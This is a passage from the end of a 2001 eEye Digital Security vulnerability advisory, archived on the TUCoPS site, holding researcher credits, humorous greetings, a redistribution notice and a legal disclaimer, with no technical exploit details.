difficult reverse engineering situations that Ryan has wet dreams
about.
Marc Maiffret - as always with superb technical insight helping to
discover and exploit the vulnerabilities in this advisory and once
again proving that two heads are better than one.
Neothoth - \"The typing machine\", for camping out day and night in the
eEye lab hammering vulnerabilities in URL handlers. Neo rocks :)
Greetings:
Mr. Patron and his tequila and the Three Wise Men(jim, jack and
johnny). Also Abraxas coffeeshop in Amsterdam. eEye would like to offer
thanks to all organizations supporting full disclosure, especially
Securityfocus.com and NMRC. Don\'t let silly politics get in the way of
what is right for everyone\'s security.
oh yeah, one more thing:
Four score and numerous advisories ago, a security company set off to
tell the world about its love of Tequila. However, little did people
know, the team was not even legal. Now that the youngin\'s Marc and
Riley turned 21 this Nov. we are all officially legal. That means the
next time the NSA buys us beer at a sec conference, they wont be
breaking the law.
Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.
Disclaimer
The information provided in this advisory may change without notice.
Your reproduction or use of this information shall constitute your
acceptance of the terms in this paragraph. This information is provided
\"AS IS\" and eEye Digital Security disclaims all warranties, express
and implied, with regard to this information. This information is
provided only for legitimate security analysis purposes. eEye Digital
Security does not condone the unauthorized access of systems or the
writing or launching of worms, viruses or other software for malicious
purposes, and specifically prohibits the use or reproduction of this
information for such purposes. In no event shall eEye Digital Security
or any author be liable for any damages whatsoever arising out of or in
connection with the use or dissemination of this information. Any use
of this information is at the user\'s own risk.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
